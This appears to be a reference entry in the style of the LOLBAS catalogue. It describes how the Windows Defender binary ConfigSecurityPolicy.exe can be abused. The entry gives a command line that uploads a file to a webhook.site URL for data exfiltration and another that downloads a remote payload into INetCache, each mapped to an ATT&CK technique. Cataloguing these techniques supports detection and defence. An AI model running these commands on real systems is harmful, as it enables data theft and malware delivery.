.. /ConfigSecurityPolicy.exe
Star

Upload
Download (INetCache)

Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Paths:

Resources:

Acknowledgements:

Detections:

Upload

  1. Upload file, credentials or data exfiltration in general

    ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
    Use case
    Upload file
    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1567

Download

  1. It will download a remote payload and place it in INetCache.

    ConfigSecurityPolicy.exe https://example.com/payload
    Use case
    Downloads payload from remote server
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105
    Tags
    Download: INetCache
    INetCache downloaders typically store files in a randomly-named folder under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE, having added [1] or a higher number between the file's name and its extension.
    If you downloaded a file named XYZ.exe, the full path of the downloaded file can be obtained by executing the following command:
    cmd.exe /c "where /r %LOCALAPPDATA%\Microsoft\Windows\INetCache XYZ*"